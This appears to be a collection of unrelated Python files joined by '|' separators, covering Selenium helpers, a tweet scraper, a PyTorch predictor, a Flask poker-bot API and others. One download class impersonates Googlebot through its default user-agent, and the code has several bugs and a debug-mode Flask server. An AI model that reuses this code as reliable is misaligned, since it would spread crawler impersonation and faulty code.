EC.visibility_of_element_located((By.ID, id))
)
if is_located:
return driver.find_element(By.ID, id)
def get_element_by_id_clickable(driver, id):
''' Get elements by id.
'''
is_located = WebDriverWait(driver, 4).until(
EC.element_to_be_clickable((By.ID, id))
)
if is_located:
return driver.find_element(By.ID, id)
def get_element_by_id_ext(driver, id):
''' Get a specified element by id.
Wait until the element is visible.
'''
is_located = WebDriverWait(driver, 10).until(
EC.visibility_of_element_located((By.ID, id))
)
if is_located:
return driver.find_element(By.ID, id)
def get_element_by_tag(driver, tag):
''' Get a specified element by tag.
Wait until the element is visible.
'''
is_located = WebDriverWait(driver, 4).until(
EC.visibility_of_element_located((By.TAG_NAME, tag))
)
if is_located:
return driver.find_element(By.TAG_NAME, tag)
def get_element_by_tag_and_text(driver, tag, text):
''' Get a specified element by tag and text.
Wait until the element is visible.
'''
is_located = WebDriverWait(driver, 4).until(
EC.text_to_be_present_in_element((By.TAG_NAME, tag), text)
)
if is_located:
return driver.find_element(By.TAG_NAME, tag)
def get_element_by_xpath(driver, xpath):
''' Get element by xpath.
'''
is_located = WebDriverWait(driver, 4).until(
EC.presence_of_element_located((By.XPATH, f'{xpath}'))
)
if is_located:
return driver.find_element(By.XPATH, f'{xpath}')
def get_element_by_xpath_clickable(driver, xpath):
''' Get element by xpath.
'''
is_located = WebDriverWait(driver, 4).until(
EC.element_to_be_clickable((By.XPATH, f'{xpath}'))
)
if is_located:
return driver.find_element(By.XPATH, f'{xpath}')
def get_element_by_xpath_visible(driver, xpath):
''' Get element by xpath.
'''
is_located = WebDriverWait(driver, 4).until(
EC.visibility_of_element_located((By.XPATH, f'{xpath}'))
)
if is_located:
return driver.find_element(By.XPATH, f'{xpath}')
def get_elements_by_css_selector(driver, selector):
''' Get elements by css selector.
'''
is_located = WebDriverWait(driver, 4).until(
EC.presence_of_all_elements_located((By.CSS_SELECTOR, f'{selector}'))
)
if is_located:
return driver.find_elements(By.CSS_SELECTOR, f'{selector}')
def get_elements_by_tag(driver, tag):
''' Get all elements by tag.
Wait until the elements are visible.
'''
is_located = WebDriverWait(driver, 4).until(
EC.visibility_of_element_located((By.TAG_NAME, tag))
)
if is_located:
return driver.find_elements(By.TAG_NAME, tag)
def get_elements_by_tag_ext(driver, tag):
''' Get all elements by tag.
Wait until the elements are visible.
'''
is_located = WebDriverWait(driver, 10).until(
EC.visibility_of_element_located((By.TAG_NAME, tag))
)
if is_located:
return driver.find_elements(By.TAG_NAME, tag)
def get_elements_by_xpath(driver, xpath):
''' Get elements by xpath.
'''
is_located = WebDriverWait(driver, 4).until(
EC.presence_of_all_elements_located((By.XPATH, f'{xpath}'))
)
if is_located:
return driver.find_elements(By.XPATH, f'{xpath}')
|
from pathlib import Path
from time import time
from logging import getLogger, FileHandler, Formatter
from cliar import Cliar
class BaseCli(Cliar):
'''Base CLI. All CLI extensions must inherit from this one.'''
def __init__(self, logs_dir=None):
super().__init__()
self.logger = getLogger('flt')
for old_handler in self.logger.handlers:
if isinstance(old_handler, FileHandler):
self.logger.removeHandler(old_handler)
filename = f'{int(time())}.log'
if logs_dir:
logs_dir_path = Path(logs_dir).resolve()
logs_dir_path.mkdir(parents=True, exist_ok=True)
filename = f'{logs_dir_path / filename}'
handler = FileHandler(filename, delay=True)
handler.setFormatter(Formatter('%(asctime)s | %(name)20s | %(levelname)8s | %(message)s'))
self.logger.addHandler(handler)
|
from backend.settings import *
from testing_platform.settings import LOGGER
from testing_platform.settings import FILE_REPO
|
#! /usr/bin/python
# -*- coding: utf-8 -*-
from jinja2 import Environment, FileSystemLoader
import ConfigParser
import os
import sys
reload(sys)
sys.setdefaultencoding('utf-8')
tamplate_dir = './templates'
output_dir = './output/'
config_file = "config"
class Config(object):
# def __init__(self, values):
# self.values = 0
def load_config(self, app_name='ibase'):
cf = ConfigParser.ConfigParser()
cf.read(config_file)
return cf.items(app_name)
if __name__ == '__main__':
config = Config()
config.load_config('ibase')
|
from typing import Callable
from typing import Union
from typer import Typer
def add(app: Typer, name: str, item: Union[Callable, Typer], **kwargs):
if isinstance(item, Typer):
app.add_typer(item, name=name, **kwargs)
else:
app.command(name, **kwargs)(item)
|
#!/usr/bin/env python
import cv2
import dlib
import rospy
from sensor_msgs.msg import Image
from cv_bridge import CvBridge, CvBridgeError
from ros_face_recognition.srv import Face
import config
import face_api
_service = "/{}/faces".format(config.topic_name)
class ImageReader:
def __init__(self):
self.bridge = CvBridge()
self.image_sub = rospy.Subscriber("/camera/rgb/image_raw", Image, self.process)
def process(self, data):
try:
image = self.bridge.imgmsg_to_cv2(data, "bgr8")
image_h, image_w = image.shape[:2]
rospy.wait_for_service(_service)
try:
faces = rospy.ServiceProxy(_service, Face)
resp1 = faces()
faces = resp1.faces
for f in faces:
rect = dlib.rectangle(
int(f.x * image_w),
int(f.y * image_h),
int((f.x + f.w) * image_w),
int((f.y + f.h) * image_h),
)
face = face_api.Face(rect)
face.details["id"] = f.label
face.details["name"] = f.name
face.details["gender"] = f.gender
face.draw_face(image)
except rospy.ServiceException, e:
print "Service call failed: %s" % e
cv2.imshow("image", image)
key = cv2.waitKey(1) & 0xFF
if key == ord('q'):
cv2.destroyAllWindows()
rospy.signal_shutdown("q key pressed")
elif key == ord('s'):
cv2.imwrite("output.jpg", image)
except CvBridgeError as e:
rospy.logerr(e)
def main():
rospy.init_node(config.topic_name, anonymous=True)
rospy.loginfo("Listening to images reader")
ImageReader()
try:
rospy.spin()
except KeyboardInterrupt:
rospy.logwarn("Shutting done ...")
if __name__ == "__main__":
main()
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import logging
from requests_futures.sessions import FuturesSession
import hashlib
import time
import copy
from datetime import timedelta
from zipfile import ZipFile
from tempfile import NamedTemporaryFile
from requests.adapters import HTTPAdapter
from urllib3.util.retry import Retry
import os
logger = logging.getLogger('download.FuturesSessionFlex')
class FuturesSessionFlex(FuturesSession):
BLOCKSIZE = 65536
SUFFIXES = ['B', 'KB', 'MB', 'GB', 'TB', 'PB']
def __init__(self, max_workers=1, user_agent='Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)', *args, **kwargs):
kwargs.update({'max_workers':max_workers})
super(FuturesSessionFlex, self).__init__(*args, **kwargs)
self.__sessions={}
self.__sessions_keys=[]
self.__fs_kwargs={}
self.__fs_kwargs.update(kwargs)
_adapter_kwargs = {'pool_connections': max_workers,'pool_maxsize': max_workers,'pool_block':True}
self.mount('https://', HTTPAdapter(**_adapter_kwargs))
self.mount('http://', HTTPAdapter(**_adapter_kwargs))
if self.headers is None:
self.headers={}
self.headers.update({'User-Agent': user_agent})
def map(self,pattern='http://',session=None):
''' if called with session None -> default session for ctor is used '''
kwargs = copy.deepcopy(self.__fs_kwargs)
kwargs['session']=session
if not pattern in self.__sessions: self.__sessions_keys.append(pattern)
self.__sessions[pattern]=FuturesSessionFlex(*(), **kwargs)
self.__sessions_keys=sorted(self.__sessions_keys, key=len, reverse=True)
def set_headers(self,headers):
self.headers.update(headers)
@staticmethod
def h_size(nbytes):
i = 0
while nbytes >= 1024 and i < len(FuturesSessionFlex.SUFFIXES)-1:
nbytes /= 1024.
i += 1
f = ('%.2f' % nbytes).rstrip('0').rstrip('.')
return '%s %s' % (f, FuturesSessionFlex.SUFFIXES[i])
@staticmethod
def add_size(session, response):
if 'Content-Length' in response.headers:
response.size=int(response.headers.get('Content-Length',0))
else:
logger.warn("Content-Length Header not provided by %s"%response.url)
response.size=len(response.content)
response.h_size=FuturesSessionFlex.h_size(response.size)
@staticmethod
def add_hash(session, response):
response.hash=None
if response.ok:
ts = str(time.time())
cv = response.headers.get('Last-Modified',ts)+response.headers.get('ETag',ts)
response.hash=hashlib.sha1(str(cv).encode('UTF-8')).hexdigest()
@staticmethod
def extract_jar(session, response):
if response.ok:
start = time.time()
FuturesSessionFlex.add_size(session, response)
response.index=NamedTemporaryFile()
with NamedTemporaryFile() as f:
for chunk in response.iter_content(chunk_size=FuturesSessionFlex.BLOCKSIZE):
if chunk: f.write(chunk)
zip_file = ZipFile(f)
idxfile = 'index-v1.json' if 'index-v1.json' in zip_file.namelist() else 'index.xml'
with zip_file.open(idxfile) as file:
while True:
byte = file.read(FuturesSessionFlex.BLOCKSIZE)
if not byte: break
response.index.write(byte)
logging.debug("%s - %s - (%s)"%(response.index.name,response.url,FuturesSessionFlex.h_size(os.stat(response.index.name).st_size)))
elapsed = time.time() - start
response.elapsed+=timedelta(seconds=elapsed)
def __lookup_fs_session(self,url):
# fast direct matches
if url in self.__sessions:
return self.__sessions[url]
# slower pattern search depends on pattern count and size
for k in self.__sessions_keys:
if url.find(k) == 0:
return self.__sessions[k]
return None
def request(self, *args, **kwargs):
session = self.__lookup_fs_session(args[1])
if not session is None:
return session.request(*args, **kwargs)
return super(FuturesSessionFlex, self).request(*args, **kwargs)
def close(self):
for key, session in self.__sessions.items():
session.close()
self.__default_sessions.close()
|
import subprocess
import os
import glob
from multiprocessing import Process
import logging
import time
from datetime import datetime
import twint as tw
print('Initialising twint config')
#tc.Output = f'tw-{datetime.now().strftime("%Y%m%d-%H%M%S")}-newsoutlets.csv' # Set filename to include current date/time
NEWSOUTLETS = ['nytimes', 'CNN', 'BBC', 'MSNBC', 'NPR', 'FoxNews', 'WSJ']
DPATH = os.getcwd() + '/data' # Equates to ./data
# Checks if the directory for a user exists in /data and creates if not
def check_dir_exists(name):
try:
os.makedirs(os.path.join(DPATH, name)) # Create directory in ./data
print(f'> Created directory in /data for {name}')
except FileExistsError: # Folder already exists
pass
# Finds the latest created file and obtains/returns datetime from filename
def get_last_scraped(username):
# Get all csv files in data/username directory
list_of_files = glob.iglob(f'{os.path.join(DPATH, username)}/*.csv')
# Get latest created file
try:
latest_scraped = max(list_of_files, key=os.path.getctime)
filename = latest_scraped.rsplit('\\', 1)[1] # Split to get filename
dstring = filename.split('.', 1)[0] # Split to get rid of .csv
# Convert strftime to datetime
last_date_time = datetime.strptime(dstring, '%Y%m%d-%H%M%S')
return str(last_date_time)
except ValueError:
pass
# Searches and extracts tweets for a given user
def scrape_tweets(tc, username):
check_dir_exists(username)
current_time = datetime.now()
tc.Output = os.path.join(DPATH, username,
current_time.strftime("%Y%m%d-%H%M%S")) + '.csv'
tc.Store_csv = True
# Set Since option to only scrape since last scraped
last_scraped = get_last_scraped(username)
# Check if there was a last time, if not don't set a Since
if last_scraped is not None:
tc.Since = get_last_scraped(username)
tc.Username = username
print(f'> Searching tweets by the user {username}')
tw.run.Search(tc)
print(f'> Search under {username} complete. Adding data to database')
insert_data(tc.Output)
# Adds objects to database using mongoimport from a given CSV file
def insert_data(filename):
# Run mongoimport tool to import data to database
list_files = subprocess.run(['mongoimport.exe', '-dtest', '-ctest',
'--headerline', '--type=csv', filename],
shell=True)
if __name__ == '__main__':
processes = []
t = tw.Config()
# Create processes for each news outlet and assign them
# to scrape_tweets function
for i in range(len(NEWSOUTLETS)):
t = tw.Config()
p = Process(target=scrape_tweets, args=(t, NEWSOUTLETS[i]))
p.start() # Start process (scrape_tweets(tc, {username}))
processes.append(p) # Append process to list of processes
for p in processes:
p.join()
# list_files = subprocess.run(['mongoimport.exe', '-dtest', '-ctest',
# '--headerline', '--type=csv', 'data.csv'],
# shell=True)
# print("The exit code was: %d" % list_files.returncode)
|
def insertionsort(arr, high):
if high<=1:
return arr
insertionsort(arr, high-1)
last=arr[high-1]
j=high-2
while j>=0 and arr[j]>last:
arr[j+1]=arr[j]
j-=1
arr[j+1]=last
if __name__=='__main__':
'''
arr=input('Enter elements: ')
arr=arr.split()
'''
arr=[10, 12, 9, 5, 8, 15, 13]
n=len(arr)
insertionsort(arr, n)
print('Sorted array: ')
for i in range(n):
print(arr[i])
|
#!/usr/bin/env python
# my own module
import os, sys
sys.path.insert(0, os.path.join(os.path.dirname(__file__), '../'))
from utilities.helpers import get_git_root
from torchvision import datasets, models, transforms
from utilities.e2wrn import wrn16_8_stl_d8d4d1
import pandas as pd
import torch
# GPU or CPU as a global variable
device = torch.device('cuda:0' if torch.cuda.is_available() else 'cpu')
class trained_model_prediction:
'''
This class applies trained models to predict class labels of images in the validation sample.
'''
def __init__(self, model_name, data_dir, img_resize=96):
'''
In the constructor the dataloader is constructed.
'''
# store the model name
self.model_name = model_name
# Data augmentation and normalization for training and validation
data_transforms = {
'train': transforms.Compose([
transforms.Resize(img_resize),
transforms.RandomHorizontalFlip(),
transforms.ToTensor(),
transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])
]),
'val': transforms.Compose([
transforms.Resize(img_resize),
transforms.ToTensor(),
transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])
]),
}
self.image_datasets = {x: datasets.ImageFolder(os.path.join(data_dir, x), data_transforms[x]) for x in ['train', 'val']}
# Since I have to make correspondence between predicted labels and filename, i have to use batch_size 1 and shuffle False. Otherwies I have to make my own DataLoader.
# ref: https://stackoverflow.com/questions/56699048/how-to-get-the-filename-of-a-sample-from-a-dataloader
self.dataloaders = {x: torch.utils.data.DataLoader(self.image_datasets[x], batch_size=1, shuffle=False, num_workers=4) for x in ['train', 'val']}
def load_trained_model(self, trained_model):
self.model = trained_model
self.model.eval()
def make_output_df(self, overwrite=False):
'''
Make and return a dataframe for model predictions.
'''
if (not os.path.exists(self.outfpn)) or overwrite:
data_dict = dict()
data_dict['filename'] = []
data_dict['true_original_label'] = []
data_dict['true_pytorch_label'] = []
for fpn, label in self.image_datasets['val'].imgs:
data_dict['filename'].append(os.path.basename(fpn))
data_dict['true_original_label'].append(os.path.dirname(fpn).split('/')[-1])
data_dict['true_pytorch_label'].append(label)
df_prediction = pd.DataFrame(data_dict)
else:
df_prediction = pd.read_csv(self.outfpn)
return df_prediction
def predict_save(self, outfpn, overwrite=False):
'''
Predict class labels and save to file.
If outfpn exists already, load the data into a dataframe and add new data to it.
'''
# prediction container
data_dict = dict()
data_dict['filename'] = []
pred_colname = self.model_name+'_label'
data_dict[pred_colname] = []
# Iterate over data.
for i, (images, labels) in enumerate(self.dataloaders['val'], 0):
images = images.to(device)
labels = labels.to(device)
with torch.set_grad_enabled(False):
outputs = self.model(images)
_, preds = torch.max(outputs, 1)
data_dict[pred_colname].extend(preds.tolist())
sample_fname, _ = self.dataloaders['val'].dataset.samples[i]
data_dict['filename'].append(os.path.basename(sample_fname))
# prepare output dataframe
self.outfpn = outfpn
self.df_prediction = self.make_output_df(overwrite=overwrite)
# self.df_prediction.set_index('filename', inplace=True)
self.df_prediction = self.df_prediction.merge(pd.DataFrame(data_dict), on='filename', how='left')
# save to file
outdir = os.path.dirname(outfpn)
if not os.path.exists(outdir):
os.makedirs(outdir)
self.df_prediction.to_csv(outfpn, index=False)
def prepare_base_model(model_fpn, image_datasets):
'''
The base model is the wide resnet provided by pytorch.
Adapt the number of classes to my data.
'''
model_ft = models.wide_resnet50_2()
num_ftrs = model_ft.fc.in_features
# Here the size of each output sample is set to len(class_names).
class_names = image_datasets['train'].classes
model_ft.fc = torch.nn.Linear(num_ftrs, len(class_names))
model_ft = model_ft.to(device)
model_ft.load_state_dict(torch.load(model_fpn))
return model_ft
if __name__ == '__main__':
# the data directory
data_dir = os.path.join(get_git_root(__file__), 'data/imagefolder-jpeg-224x224')
# load base model
base_model_prediction = trained_model_prediction('wide_resnet50_2', data_dir, 224)
base_model_pathname = os.path.join(get_git_root(__file__), 'model_weights/224x224/wide_resnet_no_augmentation.pt')
base_model = prepare_base_model(base_model_pathname, base_model_prediction.image_datasets)
base_model_prediction.load_trained_model(base_model)
base_model_prediction.predict_save('processes_data/predictions.csv', overwrite=True)
# load e2cnn model
e2cnn_model_prediction = trained_model_prediction('wrn16_8_stl_d8d4d1', data_dir, 96)
e2cnn_model_pathname = os.path.join(get_git_root(__file__), 'model_weights/96x96/wrn16_8_stl_d8d4d1_lr1.0e-05_sgd_epoch90.pt')
e2cnn_model = wrn16_8_stl_d8d4d1(num_classes=len(base_model_prediction.image_datasets['train'].classes))
e2cnn_model = e2cnn_model.to(device)
e2cnn_model.load_state_dict(torch.load(e2cnn_model_pathname))
e2cnn_model_prediction.load_trained_model(e2cnn_model)
e2cnn_model_prediction.predict_save('processed_data/predictions.csv')
|
import os
import copy
import json
import logging
import pymongo
import numpy as np
from torch import set_grad_enabled
from torch import load
from torch import device as D
from pymongo import MongoClient
from collections import defaultdict
from flask import Flask, jsonify, request
from flask_cors import CORS
from poker_env.env import Poker,flatten
import poker_env.datatypes as pdt
from poker_env.config import Config
from models.model_utils import norm_frequencies
from models.networks import OmahaActor,OmahaObsQCritic
"""
API for connecting the Poker Env with Alex's frontend client for baseline testing the trained bot.
"""
class API(object):
def __init__(self):
self.increment_position = {'SB':'BB','BB':'SB'}
self.seed = 1458
self.connect()
self.game_object = pdt.Globals.GameTypeDict[pdt.GameTypes.OMAHAHI]
self.config = Config()
self.env_params = {
'game':pdt.GameTypes.OMAHAHI,
'betsizes': self.game_object.rule_params['betsizes'],
'bet_type': self.game_object.rule_params['bettype'],
'n_players': 2,
'pot':self.game_object.state_params['pot'],
'stacksize': self.game_object.state_params['stacksize'],
'cards_per_player': self.game_object.state_params['cards_per_player'],
'starting_street': self.game_object.starting_street,
'global_mapping':self.config.global_mapping,
'state_mapping':self.config.state_mapping,
'obs_mapping':self.config.obs_mapping,
'shuffle':True
}
self.env = Poker(self.env_params)
self.network_params = self.instantiate_network_params()
self.actor = OmahaActor(self.seed,self.env.state_space,self.env.action_space,self.env.betsize_space,self.network_params)
self.critic = OmahaObsQCritic(self.seed,self.env.state_space,self.env.action_space,self.env.betsize_space,self.network_params)
self.load_model(self.actor,self.config.production_actor)
self.load_model(self.critic,self.config.production_critic)
self.player = {'name':None,'position':'BB'}
self.reset_trajectories()
def reset_trajectories(self):
self.trajectories = defaultdict(lambda:[])
self.trajectory = defaultdict(lambda:{'states':[],'obs':[],'betsize_masks':[],'action_masks':[], 'actions':[],'action_category':[],'action_probs':[],'action_prob':[],'betsize':[],'rewards':[],'value':[]})
def instantiate_network_params(self):
device = 'cpu'
network_params = copy.deepcopy(self.config.network_params)
network_params['maxlen'] = self.config.maxlen
network_params['device'] = device
return network_params
def load_model(self,model,path):
if os.path.isfile(path):
model.load_state_dict(load(path,map_location=D('cpu')))
set_grad_enabled(False)
else:
raise ValueError('File does not exist')
def connect(self):
client = MongoClient('localhost', 27017,maxPoolSize=10000)
self.db = client.baseline
def update_player_name(self,name:str):
"""updates player name"""
self.player['name'] = name
def update_player_position(self,position):
self.player['position'] = position
def insert_model_outputs(self,model_outputs,action_mask):
outputs_json = {
'action':model_outputs['action'],
'action_category':model_outputs['action_category'],
'betsize':model_outputs['betsize'],
'action_prob':model_outputs['action_prob'].detach().numpy().tolist(),
'action_probs':model_outputs['action_probs'].detach().numpy().tolist(),
'value':model_outputs['value'].detach().numpy().tolist(),
'action_mask':action_mask.tolist(),
'player':self.player['name']
}
self.db['bot_data'].insert_one(outputs_json)
def insert_into_db(self,training_data:dict):
"""
stores player data in the player_stats collection.
takes trajectories and inserts them into db for data analysis and learning.
"""
stats_json = {
'game':self.env.game,
'player':self.player['name'],
'reward':training_data[self.player['position']][0]['rewards'][0],
'position':self.player['position'],
}
self.db['player_stats'].insert_one(stats_json)
keys = training_data.keys()
positions = [position for position in keys if position in ['SB','BB']]
for position in positions:
for i,poker_round in enumerate(training_data[position]):
states = poker_round['states']
observations = poker_round['obs']
actions = poker_round['actions']
action_prob = poker_round['action_prob']
action_probs = poker_round['action_probs']
action_categories = poker_round['action_category']
betsize_masks = poker_round['betsize_masks']
action_masks = poker_round['action_masks']
rewards = poker_round['rewards']
betsizes = poker_round['betsize']
values = poker_round['value']
assert(isinstance(rewards,list))
assert(isinstance(actions,list))
assert(isinstance(action_prob,list))
assert(isinstance(action_probs,list))
assert(isinstance(states,list))
assert(isinstance(values,list))
for step,state in enumerate(states):
state_json = {
'game':self.env.game,
'player':self.player['name'],
'poker_round':step,
'state':state.tolist(),
'action_probs':action_probs[step].tolist(),
'action_prob':action_prob[step].tolist(),
'action':actions[step],
'action_category':action_categories[step],
'betsize_mask':betsize_masks[step].tolist(),
'action_mask':action_masks[step].tolist(),
'betsize':betsizes[step],
'reward':rewards[step],
'value':values[step].tolist()
}
self.db['game_data'].insert_one(state_json)
def return_model_outputs(self):
query = {
'player':self.player['name']
}
player_data = self.db['bot_data'].find(query).sort('_id',-1)
action_probs = []
values = []
action_mask = []
for result in player_data:
action_probs.append(np.array(result['action_probs']))
values.append(np.array(result['value']))
action_mask.append(np.array(result['action_mask']))
break
if action_probs:
action_probs = action_probs[0]
values = values[0]
action_mask = action_mask[0]
if np.sum(action_probs) > 0:
action_probs *= action_mask
action_probs /= np.sum(action_probs)
# scale values
if np.max(np.abs(values)) > 0:
values *= action_mask
values /= self.env_params['stacksize'] + self.env_params['pot']
model_outputs = {
'action_probs':action_probs.tolist(),
'q_values':[values.tolist()]
}
else:
model_outputs = {
'action_probs':[0]*self.env.action_space,
'q_values':[0]*self.env.action_space
}
print(model_outputs)
print(action_mask)
return model_outputs
def return_player_stats(self):
"""Returns dict of current player stats against the bot."""
query = {
'player':self.player['name']
}
# projection ={'reward':1,'hand_num':1,'_id':0}
player_data = self.db['player_stats'].find(query)
total_hands = self.db['player_stats'].count_documents(query)
results = []
position_results = {'SB':0,'BB':0}
# total_hands = 0
for result in player_data:
results.append(result['reward'])
position_results[result['position']] += result['reward']
bb_per_hand = sum(results) / total_hands if total_hands > 0 else 0
sb_bb_per_hand = position_results['SB'] / total_hands if total_hands > 0 else 0
bb_bb_per_hand = position_results['BB'] / total_hands if total_hands > 0 else 0
player_stats = {
'results':sum(results),
'bb_per_hand':round(bb_per_hand,2),
'total_hands':total_hands,
'SB':round(sb_bb_per_hand,2),
'BB':round(bb_bb_per_hand,2),
}
return player_stats
def parse_env_outputs(self,state,action_mask,betsize_mask,done):
"""Wraps state and passes to frontend. Can be the dummy last state. In which case hero mappings are reversed."""
reward = state[:,-1][:,self.env.state_mapping['hero_stacksize']] - self.env.starting_stack
# cards go in a list
hero = self.env.players[self.player['position']]
villain = self.env.players[self.increment_position[self.player['position']]]
state_object = {
'history' :state.tolist(),
'betsizes' :self.env.betsizes.tolist(),
'mapping' :self.env.state_mapping,
'current_player' :pdt.Globals.POSITION_MAPPING[self.env.current_player],
'hero_stack' :hero.stack,
'hero_position' :pdt.Globals.POSITION_MAPPING[hero.position],
'hero_cards' :flatten(hero.hand),
'hero_street_total' :hero.street_total,
'pot' :float(state[:,-1][:,self.env.state_mapping['pot']][0]),
'board_cards' :state[:,-1][:,self.env.state_mapping['board']][0].tolist(),
'villain_stack' :villain.stack,
'villain_position' :pdt.Globals.POSITION_MAPPING[villain.position],
'villain_cards' :flatten(villain.hand),
'villain_street_total' :villain.street_total,
'last_action' :int(state[:,-1][:,self.env.state_mapping['last_action']][0]),
'last_betsize' :float(state[:,-1][:,self.env.state_mapping['last_betsize']][0]),
'last_position' :int(state[:,-1][:,self.env.state_mapping['last_position']][0]),
'last_aggressive_action' :int(state[:,-1][:,self.env.state_mapping['last_aggressive_action']][0]),
'last_aggressive_betsize' :float(state[:,-1][:,self.env.state_mapping['last_aggressive_betsize']][0]),
'last_aggressive_position' :int(state[:,-1][:,self.env.state_mapping['last_aggressive_position']][0]),
'done' :done,
'action_mask' :action_mask.tolist(),
'betsize_mask' :betsize_mask.tolist(),
'street' :int(state[:,-1][:,self.env.state_mapping['street']][0]),
'blind' :bool(state[:,-1][:,self.env.state_mapping['blind']][0])
}
outcome_object = {
'player1_reward' :hero.stack - self.env.starting_stack,
'player1_hand' :flatten(hero.hand),
'player2_reward' :villain.stack - self.env.starting_stack,
'player2_hand' :flatten(villain.hand),
'player1_handrank' :hero.handrank,
'player2_handrank' :villain.handrank
}
json_obj = {'state':state_object,'outcome':outcome_object}
return json.dumps(json_obj)
def store_state(self,state,obs,action_mask,betsize_mask):
cur_player = self.env.current_player
self.trajectory[cur_player]['states'].append(copy.copy(state))
self.trajectory[cur_player]['action_masks'].append(copy.copy(action_mask))
self.trajectory[cur_player]['betsize_masks'].append(copy.copy(betsize_mask))
def store_actions(self,actor_outputs):
cur_player = self.env.current_player
self.trajectory[cur_player]['actions'].append(actor_outputs['action'])
self.trajectory[cur_player]['action_category'].append(actor_outputs['action_category'])
self.trajectory[cur_player]['action_prob'].append(actor_outputs['action_prob'])
self.trajectory[cur_player]['action_probs'].append(actor_outputs['action_probs'])
self.trajectory[cur_player]['betsize'].append(actor_outputs['betsize'])
self.trajectory[cur_player]['value'].append(actor_outputs['value'])
def query_bot(self,state,obs,action_mask,betsize_mask,done):
while self.env.current_player != self.player['position'] and not done:
actor_outputs = self.actor(state,action_mask,betsize_mask)
critic_outputs = self.critic(obs)
actor_outputs['value'] = critic_outputs['value']
self.insert_model_outputs(actor_outputs,action_mask)
self.store_actions(actor_outputs)
state,obs,done,action_mask,betsize_mask = self.env.step(actor_outputs)
if not done:
self.store_state(state,obs,action_mask,betsize_mask)
return state,obs,done,action_mask,betsize_mask
def reset(self):
assert self.player['name'] is not None
assert isinstance(self.player['position'],str)
self.reset_trajectories()
self.update_player_position(self.increment_position[self.player['position']])
state,obs,done,action_mask,betsize_mask = self.env.reset()
self.store_state(state,obs,action_mask,betsize_mask)
if self.env.current_player != self.player['position'] and not done:
state,obs,done,action_mask,betsize_mask = self.query_bot(state,obs,action_mask,betsize_mask,done)
assert self.env.current_player == self.player['position']
return self.parse_env_outputs(state,action_mask,betsize_mask,done)
def step(self,action:str,betsize:float):
"""Maps action + betsize -> to a flat action category"""
assert self.player['name'] is not None
assert isinstance(self.player['position'],str)
if isinstance(betsize,str):
betsize = float(betsize)
action_type = pdt.Globals.SERVER_ACTION_DICT[action]
flat_action_category,betsize_category = self.env.convert_to_category(action_type,betsize)
assert isinstance(flat_action_category,int)
player_outputs = {
'action':flat_action_category,
'action_category':action_type,
'betsize':betsize_category,
'action_prob':np.array([0]),
'action_probs':np.zeros(self.env.action_space + self.env.betsize_space - 2),
'value':np.zeros(self.env.action_space + self.env.betsize_space - 2)
}
self.store_actions(player_outputs)
state,obs,done,action_mask,betsize_mask = self.env.step(player_outputs)
if not done:
self.store_state(state,obs,action_mask,betsize_mask)
if self.env.current_player != self.player['position']:
state,obs,done,action_mask,betsize_mask = self.query_bot(state,obs,action_mask,betsize_mask,done)
if done:
rewards = self.env.player_rewards()
for position in self.trajectory.keys():
N = len(self.trajectory[position]['betsize_masks'])
self.trajectory[position]['rewards'] = [rewards[position]] * N
self.trajectories[position].append(self.trajectory[position])
self.insert_into_db(self.trajectories)
return self.parse_env_outputs(state,action_mask,betsize_mask,done)
@property
def current_player(self):
return self.player
# instantiate env
api = API()
app = Flask(__name__)
app.config['CORS_HEADERS'] = 'Content-Type'
cors = CORS(app, resources={r"/api/*": {"origins": "http://localhost:*"}})
cors = CORS(app, resources={r"/api/*": {"origins": "http://71.237.218.23*"}}) # This should be replaced with server public ip
logging.basicConfig(level=logging.DEBUG)
@app.route('/health')
def home():
return 'Server is up and running'
@app.route('/api/player/name',methods=['POST'])
def player():
req_data = json.loads(request.get_data())
api.update_player_name(req_data.get('name'))
return 'Updated Name'
@app.route('/api/player/stats')
def player_stats():
return json.dumps(api.return_player_stats())
@app.route('/api/model/outputs')
def model_outputs():
return json.dumps(api.return_model_outputs())
@app.route('/api/model/load',methods=['POST'])
def load_model():
req_data = json.loads(request.get_data())
api.load_model(req_data.get('path'))
return 'Loaded Model'
@app.route('/api/reset')
def reset():
return api.reset()
@app.route('/api/step', methods=['POST'])
def gen_routes():
log = logging.getLogger(__name__)
log.info(request.get_data())
req_data = json.loads(request.get_data())
action = req_data.get('action')
betsize = req_data.get('betsize')
log.info(f'action {action}')
log.info(f'betsize {betsize}')
return api.step(action,betsize)
if __name__ == '__main__':
app.run(debug=True, port=4000)
|
from types import SimpleNamespace
import numpy as np
STATE_VARIABLES = np.sort(
["angle", "angleD", "angle_cos", "angle_sin", "position", "positionD",]
)
STATE_INDICES = {x: np.where(STATE_VARIABLES == x)[0][0] for x in STATE_VARIABLES}
CONTROL_INPUTS = np.sort(["Q"])
CONTROL_INDICES = {x: np.where(CONTROL_INPUTS == x)[0][0] for x in CONTROL_INPUTS}
"""Define indices of values in state statically"""
ANGLE_IDX = STATE_INDICES["angle"].item()
ANGLED_IDX = STATE_INDICES["angleD"].item()
POSITION_IDX = STATE_INDICES["position"].item()
POSITIOND_IDX = STATE_INDICES["positionD"].item()
ANGLE_COS_IDX = STATE_INDICES["angle_cos"].item()
ANGLE_SIN_IDX = STATE_INDICES["angle_sin"].item()
def create_cartpole_state(state: dict = {}, dtype=None) -> np.ndarray:
"""
Constructor of cartpole state from named arguments. The order of variables is fixed in STATE_VARIABLES.
Input parameters are passed as a dict with the following possible keys. Other keys are ignored.
Unset key-value pairs are initialized to 0.
:param angle: Pole angle. 0 means pole is upright. Clockwise angle rotation is defined as negative.
:param angleD: Angular velocity of pole.
:param position: Horizontal position of pole.
:param positionD: Horizontal velocity of pole. Cart movement to the right is positive.
:returns: A numpy.ndarray with values filled in order set by STATE_VARIABLES
"""
state["angle_cos"] = (
np.cos(state["angle"]) if "angle" in state.keys() else np.cos(0.0)
)
state["angle_sin"] = (
np.sin(state["angle"]) if "angle" in state.keys() else np.sin(0.0)
)
if dtype is None:
dtype = np.float32
s = np.zeros_like(STATE_VARIABLES, dtype=dtype)
for i, v in enumerate(STATE_VARIABLES):
s[i] = state.get(v) if v in state.keys() else s[i]
return s
# THE FUNCTIONS BELOW ARE POTENTIALLY SLOW!
def cartpole_state_varname_to_index(variable_name: str) -> int:
return STATE_INDICES[variable_name]
def cartpole_state_index_to_varname(index: int) -> str:
return STATE_VARIABLES[index]
